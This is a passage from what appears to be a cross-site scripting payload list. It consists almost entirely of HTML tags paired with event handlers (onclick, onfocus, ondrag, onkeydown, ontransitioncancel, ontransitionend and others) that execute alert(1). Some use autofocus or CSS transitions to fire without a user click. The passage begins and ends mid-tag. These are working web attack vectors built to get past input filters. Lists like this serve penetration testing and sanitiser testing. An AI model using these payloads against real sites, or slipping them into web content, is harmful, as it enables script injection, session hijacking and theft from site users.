ondragleave="alert(1)">test</small> <small draggable="true" ondragstart="alert(1)">test</small> <small id=x tabindex=1 onactivate=alert(1)></small> <small id=x tabindex=1 onbeforeactivate=alert(1)></small> <small id=x tabindex=1 onbeforedeactivate=alert(1)></small><input autofocus> <small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus> <small id=x tabindex=1 onfocus=alert(1)></small> <small id=x tabindex=1 onfocusin=alert(1)></small> <small onbeforecopy="alert(1)" contenteditable>test</small> <small onbeforecut="alert(1)" contenteditable>test</small> <small onbeforepaste="alert(1)" contenteditable>test</small> <small onblur=alert(1) tabindex=1 id=x></small><input autofocus> <small onclick="alert(1)">test</small> <small oncontextmenu="alert(1)">test</small> <small oncopy="alert(1)" contenteditable>test</small> <small oncut="alert(1)" contenteditable>test</small> <small ondblclick="alert(1)">test</small> <small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus> <small onkeydown="alert(1)" contenteditable>test</small> <small onkeypress="alert(1)" contenteditable>test</small> <small onkeyup="alert(1)" contenteditable>test</small> <small onmousedown="alert(1)">test</small> <small onmouseenter="alert(1)">test</small> <small onmouseleave="alert(1)">test</small> <small onmousemove="alert(1)">test</small> <small onmouseout="alert(1)">test</small> <small onmouseover="alert(1)">test</small> <small onmouseup="alert(1)">test</small> <small onpaste="alert(1)" contenteditable>test</small> <source draggable="true" ondrag="alert(1)">test</source> <source draggable="true" ondragend="alert(1)">test</source> <source draggable="true" ondragenter="alert(1)">test</source> <source draggable="true" ondragleave="alert(1)">test</source> <source draggable="true" ondragstart="alert(1)">test</source> <source id=x tabindex=1 onactivate=alert(1)></source> <source id=x tabindex=1 onbeforeactivate=alert(1)></source> <source id=x tabindex=1 onbeforedeactivate=alert(1)></source><input autofocus> <source id=x tabindex=1 ondeactivate=alert(1)></source><input id=y autofocus> <source id=x tabindex=1 onfocus=alert(1)></source> <source id=x tabindex=1 onfocusin=alert(1)></source> <source onbeforecopy="alert(1)" contenteditable>test</source> <source onbeforecut="alert(1)" contenteditable>test</source> <source onbeforepaste="alert(1)" contenteditable>test</source> <source onblur=alert(1) tabindex=1 id=x></source><input autofocus> <source onclick="alert(1)">test</source> <source oncontextmenu="alert(1)">test</source> <source oncopy="alert(1)" contenteditable>test</source> <source oncut="alert(1)" contenteditable>test</source> <source ondblclick="alert(1)">test</source> <source onfocusout=alert(1) tabindex=1 id=x></source><input autofocus> <source onkeydown="alert(1)" contenteditable>test</source> <source onkeypress="alert(1)" contenteditable>test</source> <source onkeyup="alert(1)" contenteditable>test</source> <source onmousedown="alert(1)">test</source> <source onmouseenter="alert(1)">test</source> <source onmouseleave="alert(1)">test</source> <source onmousemove="alert(1)">test</source> <source onmouseout="alert(1)">test</source> <source onmouseover="alert(1)">test</source> <source onmouseup="alert(1)">test</source> <source onpaste="alert(1)" contenteditable>test</source> <spacer draggable="true" ondrag="alert(1)">test</spacer> <spacer draggable="true" ondragend="alert(1)">test</spacer> <spacer draggable="true" ondragenter="alert(1)">test</spacer> <spacer draggable="true" ondragleave="alert(1)">test</spacer> <spacer draggable="true" ondragstart="alert(1)">test</spacer> <spacer id=x tabindex=1 onactivate=alert(1)></spacer> <spacer id=x tabindex=1 onbeforeactivate=alert(1)></spacer> <spacer id=x tabindex=1 onbeforedeactivate=alert(1)></spacer><input autofocus> <spacer id=x tabindex=1 ondeactivate=alert(1)></spacer><input id=y autofocus> <spacer id=x tabindex=1 onfocus=alert(1)></spacer> <spacer id=x tabindex=1 onfocusin=alert(1)></spacer> <spacer onbeforecopy="alert(1)" contenteditable>test</spacer> <spacer onbeforecut="alert(1)" contenteditable>test</spacer> <spacer onbeforepaste="alert(1)" contenteditable>test</spacer> <spacer onblur=alert(1) tabindex=1 id=x></spacer><input autofocus> <spacer onclick="alert(1)">test</spacer> <spacer oncontextmenu="alert(1)">test</spacer> <spacer oncopy="alert(1)" contenteditable>test</spacer> <spacer oncut="alert(1)" contenteditable>test</spacer> <spacer ondblclick="alert(1)">test</spacer> <spacer onfocusout=alert(1) tabindex=1 id=x></spacer><input autofocus> <spacer onkeydown="alert(1)" contenteditable>test</spacer> <spacer onkeypress="alert(1)" contenteditable>test</spacer> <spacer onkeyup="alert(1)" contenteditable>test</spacer> <spacer onmousedown="alert(1)">test</spacer> <spacer onmouseenter="alert(1)">test</spacer> <spacer onmouseleave="alert(1)">test</spacer> <spacer onmousemove="alert(1)">test</spacer> <spacer onmouseout="alert(1)">test</spacer> <spacer onmouseover="alert(1)">test</spacer> <spacer onmouseup="alert(1)">test</spacer> <spacer onpaste="alert(1)" contenteditable>test</spacer> <span draggable="true" ondrag="alert(1)">test</span> <span draggable="true" ondragend="alert(1)">test</span> <span draggable="true" ondragenter="alert(1)">test</span> <span draggable="true" ondragleave="alert(1)">test</span> <span draggable="true" ondragstart="alert(1)">test</span> <span id=x tabindex=1 onactivate=alert(1)></span> <span id=x tabindex=1 onbeforeactivate=alert(1)></span> <span id=x tabindex=1 onbeforedeactivate=alert(1)></span><input autofocus> <span id=x tabindex=1 ondeactivate=alert(1)></span><input id=y autofocus> <span id=x tabindex=1 onfocus=alert(1)></span> <span id=x tabindex=1 onfocusin=alert(1)></span> <span onbeforecopy="alert(1)" contenteditable>test</span> <span onbeforecut="alert(1)" contenteditable>test</span> <span onbeforepaste="alert(1)" contenteditable>test</span> <span onblur=alert(1) tabindex=1 id=x></span><input autofocus> <span onclick="alert(1)">test</span> <span oncontextmenu="alert(1)">test</span> <span oncopy="alert(1)" contenteditable>test</span> <span oncut="alert(1)" contenteditable>test</span> <span ondblclick="alert(1)">test</span> <span onfocusout=alert(1) tabindex=1 id=x></span><input autofocus> <span onkeydown="alert(1)" contenteditable>test</span> <span onkeypress="alert(1)" contenteditable>test</span> <span onkeyup="alert(1)" contenteditable>test</span> <span onmousedown="alert(1)">test</span> <span onmouseenter="alert(1)">test</span> <span onmouseleave="alert(1)">test</span> <span onmousemove="alert(1)">test</span> <span onmouseout="alert(1)">test</span> <span onmouseover="alert(1)">test</span> <span onmouseup="alert(1)">test</span> <span onpaste="alert(1)" contenteditable>test</span> <strike draggable="true" ondrag="alert(1)">test</strike> <strike draggable="true" ondragend="alert(1)">test</strike> <strike draggable="true" ondragenter="alert(1)">test</strike> <strike draggable="true" ondragleave="alert(1)">test</strike> <strike draggable="true" ondragstart="alert(1)">test</strike> <strike id=x tabindex=1 onactivate=alert(1)></strike> <strike id=x tabindex=1 onbeforeactivate=alert(1)></strike> <strike id=x tabindex=1 onbeforedeactivate=alert(1)></strike><input autofocus> <strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus> <strike id=x tabindex=1 onfocus=alert(1)></strike> <strike id=x tabindex=1 onfocusin=alert(1)></strike> <strike onbeforecopy="alert(1)" contenteditable>test</strike> <strike onbeforecut="alert(1)" contenteditable>test</strike> <strike onbeforepaste="alert(1)" contenteditable>test</strike> <strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus> <strike onclick="alert(1)">test</strike> <strike oncontextmenu="alert(1)">test</strike> <strike oncopy="alert(1)" contenteditable>test</strike> <strike oncut="alert(1)" contenteditable>test</strike> <strike ondblclick="alert(1)">test</strike> <strike onfocusout=alert(1) tabindex=1 id=x></strike><input autofocus> <strike onkeydown="alert(1)" contenteditable>test</strike> <strike onkeypress="alert(1)" contenteditable>test</strike> <strike onkeyup="alert(1)" contenteditable>test</strike> <strike onmousedown="alert(1)">test</strike> <strike onmouseenter="alert(1)">test</strike> <strike onmouseleave="alert(1)">test</strike> <strike onmousemove="alert(1)">test</strike> <strike onmouseout="alert(1)">test</strike> <strike onmouseover="alert(1)">test</strike> <strike onmouseup="alert(1)">test</strike> <strike onpaste="alert(1)" contenteditable>test</strike> <strong draggable="true" ondrag="alert(1)">test</strong> <strong draggable="true" ondragend="alert(1)">test</strong> <strong draggable="true" ondragenter="alert(1)">test</strong> <strong draggable="true" ondragleave="alert(1)">test</strong> <strong draggable="true" ondragstart="alert(1)">test</strong> <strong id=x tabindex=1 onactivate=alert(1)></strong> <strong id=x tabindex=1 onbeforeactivate=alert(1)></strong> <strong id=x tabindex=1 onbeforedeactivate=alert(1)></strong><input autofocus> <strong id=x tabindex=1 ondeactivate=alert(1)></strong><input id=y autofocus> <strong id=x tabindex=1 onfocus=alert(1)></strong> <strong id=x tabindex=1 onfocusin=alert(1)></strong> <strong onbeforecopy="alert(1)" contenteditable>test</strong> <strong onbeforecut="alert(1)" contenteditable>test</strong> <strong onbeforepaste="alert(1)" contenteditable>test</strong> <strong onblur=alert(1) tabindex=1 id=x></strong><input autofocus> <strong onclick="alert(1)">test</strong> <strong oncontextmenu="alert(1)">test</strong> <strong oncopy="alert(1)" contenteditable>test</strong> <strong oncut="alert(1)" contenteditable>test</strong> <strong ondblclick="alert(1)">test</strong> <strong onfocusout=alert(1) tabindex=1 id=x></strong><input autofocus> <strong onkeydown="alert(1)" contenteditable>test</strong> <strong onkeypress="alert(1)" contenteditable>test</strong> <strong onkeyup="alert(1)" contenteditable>test</strong> <strong onmousedown="alert(1)">test</strong> <strong onmouseenter="alert(1)">test</strong> <strong onmouseleave="alert(1)">test</strong> <strong onmousemove="alert(1)">test</strong> <strong onmouseout="alert(1)">test</strong> <strong onmouseover="alert(1)">test</strong> <strong onmouseup="alert(1)">test</strong> <strong onpaste="alert(1)" contenteditable>test</strong> <style draggable="true" ondrag="alert(1)">test</style> <style draggable="true" ondragend="alert(1)">test</style> <style draggable="true" ondragenter="alert(1)">test</style> <style draggable="true" ondragleave="alert(1)">test</style> <style draggable="true" ondragstart="alert(1)">test</style> <style id=x tabindex=1 onactivate=alert(1)></style> <style id=x tabindex=1 onbeforeactivate=alert(1)></style> <style id=x tabindex=1 onbeforedeactivate=alert(1)></style><input autofocus> <style id=x tabindex=1 ondeactivate=alert(1)></style><input id=y autofocus> <style id=x tabindex=1 onfocus=alert(1)></style> <style id=x tabindex=1 onfocusin=alert(1)></style> <style onbeforecopy="alert(1)" contenteditable>test</style> <style onbeforecut="alert(1)" contenteditable>test</style> <style onbeforepaste="alert(1)" contenteditable>test</style> <style onblur=alert(1) tabindex=1 id=x></style><input autofocus> <style onclick="alert(1)">test</style> <style oncontextmenu="alert(1)">test</style> <style oncopy="alert(1)" contenteditable>test</style> <style oncut="alert(1)" contenteditable>test</style> <style ondblclick="alert(1)">test</style> <style onfocusout=alert(1) tabindex=1 id=x></style><input autofocus> <style onkeydown="alert(1)" contenteditable>test</style> <style onkeypress="alert(1)" contenteditable>test</style> <style onkeyup="alert(1)" contenteditable>test</style> <style onload=alert(1)></style> <style onmousedown="alert(1)">test</style> <style onmouseenter="alert(1)">test</style> <style onmouseleave="alert(1)">test</style> <style onmousemove="alert(1)">test</style> <style onmouseout="alert(1)">test</style> <style onmouseover="alert(1)">test</style> <style onmouseup="alert(1)">test</style> <style onpaste="alert(1)" contenteditable>test</style> <style onreadystatechange=alert(1)></style> <style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a> <style>:target {color: red;}</style><abbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></abbr> <style>:target {color: red;}</style><acronym id=x style="transition:color 10s" ontransitioncancel=alert(1)></acronym> <style>:target {color: red;}</style><address id=x style="transition:color 10s" ontransitioncancel=alert(1)></address> <style>:target {color: red;}</style><applet id=x style="transition:color 10s" ontransitioncancel=alert(1)></applet> <style>:target {color: red;}</style><area id=x style="transition:color 10s" ontransitioncancel=alert(1)></area> <style>:target {color: red;}</style><article id=x style="transition:color 10s" ontransitioncancel=alert(1)></article> <style>:target {color: red;}</style><aside id=x style="transition:color 10s" ontransitioncancel=alert(1)></aside> <style>:target {color: red;}</style><audio id=x style="transition:color 10s" ontransitioncancel=alert(1)></audio> <style>:target {color: red;}</style><b id=x style="transition:color 10s" ontransitioncancel=alert(1)></b> <style>:target {color: red;}</style><base id=x style="transition:color 10s" ontransitioncancel=alert(1)></base> <style>:target {color: red;}</style><basefont id=x style="transition:color 10s" ontransitioncancel=alert(1)></basefont> <style>:target {color: red;}</style><bdi id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdi> <style>:target {color: red;}</style><bdo id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdo> <style>:target {color: red;}</style><bgsound id=x style="transition:color 10s" ontransitioncancel=alert(1)></bgsound> <style>:target {color: red;}</style><big id=x style="transition:color 10s" ontransitioncancel=alert(1)></big> <style>:target {color: red;}</style><blink id=x style="transition:color 10s" ontransitioncancel=alert(1)></blink> <style>:target {color: red;}</style><blockquote id=x style="transition:color 10s" ontransitioncancel=alert(1)></blockquote> <style>:target {color: red;}</style><body id=x style="transition:color 10s" ontransitioncancel=alert(1)></body> <style>:target {color: red;}</style><br id=x style="transition:color 10s" ontransitioncancel=alert(1)></br> <style>:target {color: red;}</style><button id=x style="transition:color 10s" ontransitioncancel=alert(1)></button> <style>:target {color: red;}</style><canvas id=x style="transition:color 10s" ontransitioncancel=alert(1)></canvas> <style>:target {color: red;}</style><caption id=x style="transition:color 10s" ontransitioncancel=alert(1)></caption> <style>:target {color: red;}</style><center id=x style="transition:color 10s" ontransitioncancel=alert(1)></center> <style>:target {color: red;}</style><cite id=x style="transition:color 10s" ontransitioncancel=alert(1)></cite> <style>:target {color: red;}</style><code id=x style="transition:color 10s" ontransitioncancel=alert(1)></code> <style>:target {color: red;}</style><col id=x style="transition:color 10s" ontransitioncancel=alert(1)></col> <style>:target {color: red;}</style><colgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></colgroup> <style>:target {color: red;}</style><command id=x style="transition:color 10s" ontransitioncancel=alert(1)></command> <style>:target {color: red;}</style><content id=x style="transition:color 10s" ontransitioncancel=alert(1)></content> <style>:target {color: red;}</style><data id=x style="transition:color 10s" ontransitioncancel=alert(1)></data> <style>:target {color: red;}</style><datalist id=x style="transition:color 10s" ontransitioncancel=alert(1)></datalist> <style>:target {color: red;}</style><dd id=x style="transition:color 10s" ontransitioncancel=alert(1)></dd> <style>:target {color: red;}</style><del id=x style="transition:color 10s" ontransitioncancel=alert(1)></del> <style>:target {color: red;}</style><details id=x style="transition:color 10s" ontransitioncancel=alert(1)></details> <style>:target {color: red;}</style><dfn id=x style="transition:color 10s" ontransitioncancel=alert(1)></dfn> <style>:target {color: red;}</style><dialog id=x style="transition:color 10s" ontransitioncancel=alert(1)></dialog> <style>:target {color: red;}</style><dir id=x style="transition:color 10s" ontransitioncancel=alert(1)></dir> <style>:target {color: red;}</style><div id=x style="transition:color 10s" ontransitioncancel=alert(1)></div> <style>:target {color: red;}</style><dl id=x style="transition:color 10s" ontransitioncancel=alert(1)></dl> <style>:target {color: red;}</style><dt id=x style="transition:color 10s" ontransitioncancel=alert(1)></dt> <style>:target {color: red;}</style><element id=x style="transition:color 10s" ontransitioncancel=alert(1)></element> <style>:target {color: red;}</style><em id=x style="transition:color 10s" ontransitioncancel=alert(1)></em> <style>:target {color: red;}</style><embed id=x style="transition:color 10s" ontransitioncancel=alert(1)></embed> <style>:target {color: red;}</style><fieldset id=x style="transition:color 10s" ontransitioncancel=alert(1)></fieldset> <style>:target {color: red;}</style><figcaption id=x style="transition:color 10s" ontransitioncancel=alert(1)></figcaption> <style>:target {color: red;}</style><figure id=x style="transition:color 10s" ontransitioncancel=alert(1)></figure> <style>:target {color: red;}</style><font id=x style="transition:color 10s" ontransitioncancel=alert(1)></font> <style>:target {color: red;}</style><footer id=x style="transition:color 10s" ontransitioncancel=alert(1)></footer> <style>:target {color: red;}</style><form id=x style="transition:color 10s" ontransitioncancel=alert(1)></form> <style>:target {color: red;}</style><frame id=x style="transition:color 10s" ontransitioncancel=alert(1)></frame> <style>:target {color: red;}</style><frameset id=x style="transition:color 10s" ontransitioncancel=alert(1)></frameset> <style>:target {color: red;}</style><h1 id=x style="transition:color 10s" ontransitioncancel=alert(1)></h1> <style>:target {color: red;}</style><head id=x style="transition:color 10s" ontransitioncancel=alert(1)></head> <style>:target {color: red;}</style><header id=x style="transition:color 10s" ontransitioncancel=alert(1)></header> <style>:target {color: red;}</style><hgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></hgroup> <style>:target {color: red;}</style><hr id=x style="transition:color 10s" ontransitioncancel=alert(1)></hr> <style>:target {color: red;}</style><html id=x style="transition:color 10s" ontransitioncancel=alert(1)></html> <style>:target {color: red;}</style><i id=x style="transition:color 10s" ontransitioncancel=alert(1)></i> <style>:target {color: red;}</style><iframe id=x style="transition:color 10s" ontransitioncancel=alert(1)></iframe> <style>:target {color: red;}</style><image id=x style="transition:color 10s" ontransitioncancel=alert(1)></image> <style>:target {color: red;}</style><img id=x style="transition:color 10s" ontransitioncancel=alert(1)></img> <style>:target {color: red;}</style><input id=x style="transition:color 10s" ontransitioncancel=alert(1)></input> <style>:target {color: red;}</style><ins id=x style="transition:color 10s" ontransitioncancel=alert(1)></ins> <style>:target {color: red;}</style><isindex id=x style="transition:color 10s" ontransitioncancel=alert(1)></isindex> <style>:target {color: red;}</style><kbd id=x style="transition:color 10s" ontransitioncancel=alert(1)></kbd> <style>:target {color: red;}</style><keygen id=x style="transition:color 10s" ontransitioncancel=alert(1)></keygen> <style>:target {color: red;}</style><label id=x style="transition:color 10s" ontransitioncancel=alert(1)></label> <style>:target {color: red;}</style><legend id=x style="transition:color 10s" ontransitioncancel=alert(1)></legend> <style>:target {color: red;}</style><li id=x style="transition:color 10s" ontransitioncancel=alert(1)></li> <style>:target {color: red;}</style><link id=x style="transition:color 10s" ontransitioncancel=alert(1)></link> <style>:target {color: red;}</style><listing id=x style="transition:color 10s" ontransitioncancel=alert(1)></listing> <style>:target {color: red;}</style><main id=x style="transition:color 10s" ontransitioncancel=alert(1)></main> <style>:target {color: red;}</style><map id=x style="transition:color 10s" ontransitioncancel=alert(1)></map> <style>:target {color: red;}</style><mark id=x style="transition:color 10s" ontransitioncancel=alert(1)></mark> <style>:target {color: red;}</style><marquee id=x style="transition:color 10s" ontransitioncancel=alert(1)></marquee> <style>:target {color: red;}</style><menu id=x style="transition:color 10s" ontransitioncancel=alert(1)></menu> <style>:target {color: red;}</style><menuitem id=x style="transition:color 10s" ontransitioncancel=alert(1)></menuitem> <style>:target {color: red;}</style><meta id=x style="transition:color 10s" ontransitioncancel=alert(1)></meta> <style>:target {color: red;}</style><meter id=x style="transition:color 10s" ontransitioncancel=alert(1)></meter> <style>:target {color: red;}</style><multicol id=x style="transition:color 10s" ontransitioncancel=alert(1)></multicol> <style>:target {color: red;}</style><nav id=x style="transition:color 10s" ontransitioncancel=alert(1)></nav> <style>:target {color: red;}</style><nextid id=x style="transition:color 10s" ontransitioncancel=alert(1)></nextid> <style>:target {color: red;}</style><nobr id=x style="transition:color 10s" ontransitioncancel=alert(1)></nobr> <style>:target {color: red;}</style><noembed id=x style="transition:color 10s" ontransitioncancel=alert(1)></noembed> <style>:target {color: red;}</style><noframes id=x style="transition:color 10s" ontransitioncancel=alert(1)></noframes> <style>:target {color: red;}</style><noscript id=x style="transition:color 10s" ontransitioncancel=alert(1)></noscript> <style>:target {color: red;}</style><object id=x style="transition:color 10s" ontransitioncancel=alert(1)></object> <style>:target {color: red;}</style><ol id=x style="transition:color 10s" ontransitioncancel=alert(1)></ol> <style>:target {color: red;}</style><optgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></optgroup> <style>:target {color: red;}</style><option id=x style="transition:color 10s" ontransitioncancel=alert(1)></option> <style>:target {color: red;}</style><output id=x style="transition:color 10s" ontransitioncancel=alert(1)></output> <style>:target {color: red;}</style><p id=x style="transition:color 10s" ontransitioncancel=alert(1)></p> <style>:target {color: red;}</style><param id=x style="transition:color 10s" ontransitioncancel=alert(1)></param> <style>:target {color: red;}</style><picture id=x style="transition:color 10s" ontransitioncancel=alert(1)></picture> <style>:target {color: red;}</style><plaintext id=x style="transition:color 10s" ontransitioncancel=alert(1)></plaintext> <style>:target {color: red;}</style><pre id=x style="transition:color 10s" ontransitioncancel=alert(1)></pre> <style>:target {color: red;}</style><progress id=x style="transition:color 10s" ontransitioncancel=alert(1)></progress> <style>:target {color: red;}</style><q id=x style="transition:color 10s" ontransitioncancel=alert(1)></q> <style>:target {color: red;}</style><rb id=x style="transition:color 10s" ontransitioncancel=alert(1)></rb> <style>:target {color: red;}</style><rp id=x style="transition:color 10s" ontransitioncancel=alert(1)></rp> <style>:target {color: red;}</style><rt id=x style="transition:color 10s" ontransitioncancel=alert(1)></rt> <style>:target {color: red;}</style><rtc id=x style="transition:color 10s" ontransitioncancel=alert(1)></rtc> <style>:target {color: red;}</style><ruby id=x style="transition:color 10s" ontransitioncancel=alert(1)></ruby> <style>:target {color: red;}</style><s id=x style="transition:color 10s" ontransitioncancel=alert(1)></s> <style>:target {color: red;}</style><samp id=x style="transition:color 10s" ontransitioncancel=alert(1)></samp> <style>:target {color: red;}</style><script id=x style="transition:color 10s" ontransitioncancel=alert(1)></script> <style>:target {color: red;}</style><section id=x style="transition:color 10s" ontransitioncancel=alert(1)></section> <style>:target {color: red;}</style><select id=x style="transition:color 10s" ontransitioncancel=alert(1)></select> <style>:target {color: red;}</style><shadow id=x style="transition:color 10s" ontransitioncancel=alert(1)></shadow> <style>:target {color: red;}</style><slot id=x style="transition:color 10s" ontransitioncancel=alert(1)></slot> <style>:target {color: red;}</style><small id=x style="transition:color 10s" ontransitioncancel=alert(1)></small> <style>:target {color: red;}</style><source id=x style="transition:color 10s" ontransitioncancel=alert(1)></source> <style>:target {color: red;}</style><spacer id=x style="transition:color 10s" ontransitioncancel=alert(1)></spacer> <style>:target {color: red;}</style><span id=x style="transition:color 10s" ontransitioncancel=alert(1)></span> <style>:target {color: red;}</style><strike id=x style="transition:color 10s" ontransitioncancel=alert(1)></strike> <style>:target {color: red;}</style><strong id=x style="transition:color 10s" ontransitioncancel=alert(1)></strong> <style>:target {color: red;}</style><style id=x style="transition:color 10s" ontransitioncancel=alert(1)></style> <style>:target {color: red;}</style><sub id=x style="transition:color 10s" ontransitioncancel=alert(1)></sub> <style>:target {color: red;}</style><summary id=x style="transition:color 10s" ontransitioncancel=alert(1)></summary> <style>:target {color: red;}</style><sup id=x style="transition:color 10s" ontransitioncancel=alert(1)></sup> <style>:target {color: red;}</style><svg id=x style="transition:color 10s" ontransitioncancel=alert(1)></svg> <style>:target {color: red;}</style><table id=x style="transition:color 10s" ontransitioncancel=alert(1)></table> <style>:target {color: red;}</style><tbody id=x style="transition:color 10s" ontransitioncancel=alert(1)></tbody> <style>:target {color: red;}</style><td id=x style="transition:color 10s" ontransitioncancel=alert(1)></td> <style>:target {color: red;}</style><template id=x style="transition:color 10s" ontransitioncancel=alert(1)></template> <style>:target {color: red;}</style><textarea id=x style="transition:color 10s" ontransitioncancel=alert(1)></textarea> <style>:target {color: red;}</style><tfoot id=x style="transition:color 10s" ontransitioncancel=alert(1)></tfoot> <style>:target {color: red;}</style><th id=x style="transition:color 10s" ontransitioncancel=alert(1)></th> <style>:target {color: red;}</style><thead id=x style="transition:color 10s" ontransitioncancel=alert(1)></thead> <style>:target {color: red;}</style><time id=x style="transition:color 10s" ontransitioncancel=alert(1)></time> <style>:target {color: red;}</style><title id=x style="transition:color 10s" ontransitioncancel=alert(1)></title> <style>:target {color: red;}</style><tr id=x style="transition:color 10s" ontransitioncancel=alert(1)></tr> <style>:target {color: red;}</style><track id=x style="transition:color 10s" ontransitioncancel=alert(1)></track> <style>:target {color: red;}</style><tt id=x style="transition:color 10s" ontransitioncancel=alert(1)></tt> <style>:target {color: red;}</style><u id=x style="transition:color 10s" ontransitioncancel=alert(1)></u> <style>:target {color: red;}</style><ul id=x style="transition:color 10s" ontransitioncancel=alert(1)></ul> <style>:target {color: red;}</style><var id=x style="transition:color 10s" ontransitioncancel=alert(1)></var> <style>:target {color: red;}</style><video id=x style="transition:color 10s" ontransitioncancel=alert(1)></video> <style>:target {color: red;}</style><wbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></wbr> <style>:target {color: red;}</style><xmp id=x style="transition:color 10s" ontransitioncancel=alert(1)></xmp> <style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a> <style>:target {color:red;}</style><abbr id=x style="transition:color 1s" ontransitionend=alert(1)></abbr> <style>:target {color:red;}</style><acronym id=x style="transition:color 1s" ontransitionend=alert(1)></acronym> <style>:target {color:red;}</style><address id=x style="transition:color 1s" ontransitionend=alert(1)></address> <style>:target {color:red;}</style><applet id=x style="transition:color 1s" ontransitionend=alert(1)></applet> <style>:target {color:red;}</style><area id=x style="transition:color 1s" ontransitionend=alert(1)></area> <style>:target {color:red;}</style><article id=x style="transition:color 1s" ontransitionend=alert(1)></article> <style>:target {color:red;}</style><aside id=x style="transition:color 1s" ontransitionend=alert(1)></aside> <style>:target {color:red;}</style><audio id=x style="transition:color 1s" ontransitionend=alert(1)></audio> <style>:target {color:red;}</style><b id=x style="transition:color 1s" ontransitionend=alert(1)></b> <style>:target {color:red;}</style><base id=x style="transition:color 1s" ontransitionend=alert(1)></base> <style>:target {color:red;}</style><basefont id=x style="transition:color 1s" ontransitionend=alert(1)></basefont> <style>:target {color:red;}</style><bdi id=x style="transition:color 1s" ontransitionend=alert(1)></bdi> <style>:target {color:red;}</style><bdo id=x style="transition:color 1s" ontransitionend=alert(1)></bdo> <style>:target {color:red;}</style><bgsound id=x style="transition:color 1s" ontransitionend=alert(1)></bgsound> <style>:target {color:red;}</style><big id=x style="transition:color 1s" ontransitionend=alert(1)></big> <style>:target {color:red;}</style><blink id=x style="transition:color 1s" ontransitionend=alert(1)></blink> <style>:target {color:red;}</style><blockquote id=x style="transition:color 1s" ontransitionend=alert(1)></blockquote> <style>:target {color:red;}</style><body id=x style="transition:color 1s" ontransitionend=alert(1)></body> <style>:target {color:red;}</style><br id=x style="transition:color 1s" ontransitionend=alert(1)></br> <style>:target {color:red;}</style><button id=x style="transition:color 1s" ontransitionend=alert(1)></button> <style>:target {color:red;}</style><canvas id=x style="transition:color 1s" ontransitionend=alert(1)></canvas> <style>:target {color:red;}</style><caption id=x style="transition:color 1s" ontransitionend=alert(1)></caption> <style>:target {color:red;}</style><center id=x style="transition:color 1s" ontransitionend=alert(1)></center> <style>:target {color:red;}</style><cite id=x style="transition:color 1s" ontransitionend=alert(1)></cite> <style>:target {color:red;}</style><code id=x style="transition:color 1s" ontransitionend=alert(1)></code> <style>:target {color:red;}</style><col id=x style="transition:color 1s" ontransitionend=alert(1)></col> <style>:target {color:red;}</style><colgroup id=x style="transition:color 1s" ontransitionend=alert(1)></colgroup> <style>:target {color:red;}</style><command id=x style="transition:color 1s" ontransitionend=alert(1)></command> <style>:target {color:red;}</style><content id=x style="transition:color 1s" ontransitionend=alert(1)></content> <style>:target {color:red;}</style><data id=x style="transition:color 1s" ontransitionend=alert(1)></data> <style>:target {color:red;}</style><datalist id=x style="transition:color 1s" ontransitionend=alert(1)></datalist> <style>:target {color:red;}</style><dd id=x style="transition:color 1s" ontransitionend=alert(1)></dd> <style>:target {color:red;}</style><del id=x style="transition:color 1s" ontransitionend=alert(1)></del> <style>:target {color:red;}</style><details id=x style="transition:color 1s" ontransitionend=alert(1)></details> <style>:target {color:red;}</style><dfn id=x style="transition:color 1s" ontransitionend=alert(1)></dfn> <style>:target {color:red;}</style><dialog id=x style="transition:color 1s" ontransitionend=alert(1)></dialog> <style>:target {color:red;}</style><dir id=x style="transition:color 1s" ontransitionend=alert(1)></dir> <style>:target {color:red;}</style><div id=x style="transition:color 1s" ontransitionend=alert(1)></div> <style>:target {color:red;}</style><dl id=x style="transition:color 1s" ontransitionend=alert(1)></dl> <style>:target {color:red;}</style><dt id=x style="transition:color 1s" ontransitionend=alert(1)></dt> <style>:target {color:red;}</style><element id=x style="transition:color 1s" ontransitionend=alert(1)></element> <style>:target {color:red;}</style><em id=x style="transition:color 1s" ontransitionend=alert(1)></em> <style>:target {color:red;}</style><embed id=x style="transition:color 1s" ontransitionend=alert(1)></embed> <style>:target {color:red;}</style><fieldset id=x style="transition:color 1s" ontransitionend=alert(1)></fieldset> <style>:target {color:red;}</style><figcaption id=x style="transition:color 1s" ontransitionend=alert(1)></figcaption> <style>:target {color:red;}</style><figure id=x style="transition:color 1s" ontransitionend=alert(1)></figure> <style>:target {color:red;}</style><font id=x style="transition:color 1s" ontransitionend=alert(1)></font> <style>:target {color:red;}</style><footer id=x style="transition:color 1s" ontransitionend=alert(1)></footer> <style>:target {color:red;}</style><form id=x style="transition:color 1s" ontransitionend=alert(1)></form> <style>:target {color:red;}</style><frame id=x style="transition:color 1s" ontransitionend=alert(1)></frame> <style>:target {color:red;}</style><frameset id=x style="transition:color 1s" ontransitionend=alert(1)></frameset> <style>:target {color:red;}</style><h1 id=x style="transition:color 1s" ontransitionend=alert(1)></h1> <style>:target {color:red;}</style><head id=x style="transition:color 1s" ontransitionend=alert(1)></head> <style>:target {color:red;}</style><header id=x style="transition:color 1s" ontransitionend=alert(1)></header> <style>:target {color:red;}</style><hgroup id=x style="transition:color 1s" ontransitionend=alert(1)></hgroup> <style>:target {color:red;}</style><hr id=x style="transition:color 1s" ontransitionend=alert(1)></hr> <style>:target {color:red;}</style><html id=x style="transition:color 1s" ontransitionend=alert(1)></html> <style>:target {color:red;}</style><i id=x style="transition:color 1s" ontransitionend=alert(1)></i> <style>:target {color:red;}</style><iframe id=x style="transition:color 1s" ontransitionend=alert(1)></iframe> <style>:target {color:red;}</style><image id=x style="transition:color 1s" ontransitionend=alert(1)></image> <style>:target {color:red;}</style><img id=x style="transition:color 1s" ontransitionend=alert(1)></img> <style>:target {color:red;}</style><input id=x style="transition:color 1s" ontransitionend=alert(1)></input> <style>:target {color:red;}</style><ins id=x style="transition:color 1s" ontransitionend=alert(1)></ins> <style>:target {color:red;}</style><isindex id=x 